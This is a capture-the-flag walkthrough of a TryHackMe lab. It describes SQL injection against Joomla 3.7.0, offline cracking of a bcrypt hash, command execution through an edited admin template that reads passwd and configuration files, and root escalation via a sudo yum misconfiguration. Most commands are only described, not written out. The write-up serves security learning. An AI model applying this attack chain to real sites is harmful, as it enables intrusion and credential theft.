Joomla! is an open-source content manager used for publishing web content applications such as forums, user communities, E-commerce and many other web-based applications.
In this tutorial I dive into Joomla! version 3.7.0 which does not properly sanitize input making it susceptible to SQL injection. Enumeration of the SQL databases discovers usernames and password hashes that are then cracked offline. The username and cracked password pair can then be used to login to the content management administrators page.
Once access is gained to the administrators page further enumeration discovers that a vulnerable page template is being used that allows command injection and displays the commands output. This flaw provides the ability to enumerate the underlying Linux operating system uncovering users, file permissions, installation config files, etc. Once access to the underlying operating system is gained privilege escalation is made possible due to weak permissions. Lets get to it.
This proof of concept was made possible by TryHackMe. We will begin by performing an Nmap scan to discover any open ports and their respective version. Below we see that port 80 is open letting us know that this IP is most likely a webpage and port 3306 is open which is hosting a MySQL database.
Because port 80 is open we can access this IP via any web browser. While browsing through the various pages and looking for anything that sticks out I began running a directory scan against the webpage. A directory scan will help assist in locating pages that I can not click on upfront. I didn’t find anything unsual while browsing the webpage manually however my discovery scan did locate an administrators login page.
Visiting the page http://10.10.37.2/administrator/
At this point login credentials are unknown but we do have some information that we can leverage to make logging in possible. The previous Nmap scan discovered a MySQL database running on the back end of this IP so I decided to enumerate that service a little further.
The Nmap scan wasn’t successful in finding any more information than was already known so I decided to launch and search Metasploit for anything based on Joomla. I stumbled across a tool that should provide the version that Joomla is running.
Running the Joomla version detector discovers that the current Joomla version is 3.7.0. Now that this information is available the next step is to research this version on Google for known vulnerabilities. After researching a few webpages it is discovered that this version of Joomla fails to sanitize input making it susceptible to SQL injection. One of the pages I stumbled upon provides the exact syntax to use all I need to do is change the IP respectively.
Sure enough the syntax did indeed work and I was able to locate a few databases sitting on this server.
Now that I have some databases to work with I can dive deeper into tables and information within each database. Below I search the tables within database joomla.
I am presented with a giant list of tables however we are focusing on low hanging fruit so I chose the _users table.
Now that I have a table I can enumerate that table for information. This time discovering a username and password hash.
Username Jonah and password hash is discovered.
This password hash can be copied and cracked offline but before doing so it is important to identify the hash that is being used. Below is my favorite site that I use for identifying various hash types.
example_hashes [hashcat wiki]
If you get a "line length exception" error in hashcat, it is often because the hash mode that you have requested does…
Once the hash is identified the next step is to crack the hash. I used John The Ripper to crack this password, to do so you must tell John The Ripper the hash that is being used. Because this step was already completed I just needed know how to tell John The Ripper the hash type and I can do so by using the below command.
The hash was identified on hashcat.net as being a bcrypt or blowfish and according to the above command it looks like John The Ripper likes that hash type format to be specified as bcrypt so I used that when cracking.
The password was successfully cracked so I now have a username and password. The next step is locating a login screen that will accept these credentials. Thinking back to the Nmap scan I recalled port 22 being open so I tried logging into that first unfortunately that was unsuccessful. However, I was able to login to the Joomla administrators page.
After the successful sign-in I browsed around and familiarized myself with the site and eventually stumbled upon a template that describes it being based on Bootstrap. This isn’t to be confused with the form of bootstrapping that takes place when starting up your computer but in terms of templates. Bootstrap is used to quickly demonstrate best practices when adding to a framework, hmm, best practices, ironic.. Let’s exploit this vulnerable template.
The template allows administrators to edit its index.php file which also accepts command inject input. When the template is saved and a user visits the website the command output is displayed on the webpage.
The highlighted section above is an example of running “ls -al” command. The screenshot below is an example of the output displayed on the webpage once the template is saved and the home page is reloaded.
I found this to be quite fun so I tried some other commands just to see what would happen as well as gather more information. In the below example I ran whoami to see what user I was while running these commands and ran pwd to see what directory we were on in the underlying operating system.
Below is the output from running the commands above. I have identified that these commands are being ran by the service account apache within the directory /var/www/html.
Continuing this process I was able to view the passwd file and discovered a username.
Below is the result of the above command showing that jonah Jameson’s user account is jjameson.
I went ahead and tried using this username with the already known password via SSH and the other login portals but was unsuccessful so I began searching further for a password that works with this discovered account.
After searching around online I learned that Joomla uses a configuration file to configure things such as paths, passwords, data base connections and other basic configurations and refers to this file as configuration.php. With any luck maybe it is possible that this configuration file has a password stored in it.
I was able to cat the configuration file by using the above command the output is below showing that there is a public password set.
Attempting to SSH using jjameson and the newly discovered password was successful. The next few screenshots highlight some of the commands that I ran right away to understand more about the system.
The below command was ran to locate any file name with the .txt extension.
The above command pointed me straight to the user flag location.
The next screenshot is a quick understanding of what directory I was currently in and the permissions of that directory. Sure enough I was already in the /home directory and there was the user.txt flag.
Now that user access has been confirmed it was time to enumerate the system further and search for areas where privilege escalation might be possible. I was able to run sudo -l which states that this user account can run yum with escalated sudo privileges and no password prompt will be displayed.
Whenever I see weak configurations like the example above my first go to is always GTFO bins https://gtfobins.github.io/ which provides example syntax used to exploitable misconfigured Unix based systems.
Sure enough there is an example for yum and the first step is creating a file.
Next all I had to do was copy the entire example from GTFO bins and paste it into my created file and save.
Run chmod to make the file executable then I ran ls -al just to verify that the file was modified to be executable.
Final step was to run the file and watch it load. Sure enough the exploit worked and as planned it ran without a password prompt and retained the sudo privileges. A quick whoami proves that jjameson is now root and has access to the entire system.
Now that the account is root it should have access to change into the root home directory.
Changing directory locations into the root home directory was possible obtaining the root flag.